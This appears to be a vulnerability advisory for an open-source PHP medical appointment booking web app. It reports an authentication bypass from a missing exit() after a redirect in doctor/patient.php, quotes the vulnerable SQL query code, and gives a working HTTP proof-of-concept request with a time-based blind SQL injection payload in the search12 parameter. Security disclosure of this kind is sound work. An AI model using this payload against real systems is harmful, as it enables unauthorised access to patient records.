This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
doctor/patient.php from line 26,the problem is at line 36header("location: ../login.php");,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header like Cookie: PHPSESSID=foo is not passed in http
doctor/patient.php from line 107,The $keyword parameter is controllable, the parameter search12 can be passed through post, and the $keyword is not protected from sql injection, line 151 $list11 = $database->query($sqlmain); causes sql injection
......
......
......
if($_POST){
if(isset($_POST["search"])){
$keyword=$_POST["search12"];
$sqlmain= "select * from patient where pemail='$keyword' or pname='$keyword' or pname like '$keyword%' or pname like '%$keyword' or pname like '%$keyword%' ";
$selecttype="my";
}
......
......
......
<?php
echo '<datalist id="patient">';
$list11 = $database->query($sqlmain);
......
......
......
POC
POST /doctor/patient.php HTTP/1.1
Host: www.edoc.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://www.edoc.net
Connection: close
Referer: http://www.edoc.net/doctor/doctors.php
Upgrade-Insecure-Requests: 1
search=1&search12=' AND (SELECT 3127 FROM (SELECT(SLEEP(5)))PKsU) AND 'rUxx'='rUxx
Vulnerability file address
doctor/patient.php
from line 26,the problem is at line 36header("location: ../login.php");
,there is no exit() termination statement after the header function in the else statement, so that the code can continue to be executed backwards, so as long as the header likeCookie: PHPSESSID=foo
is not passed in httpdoctor/patient.php
from line 107,The $keyword parameter is controllable, the parameter search12 can be passed through post, and the $keyword is not protected from sql injection, line 151$list11 = $database->query($sqlmain);
causes sql injectionPOC
Attack results pictures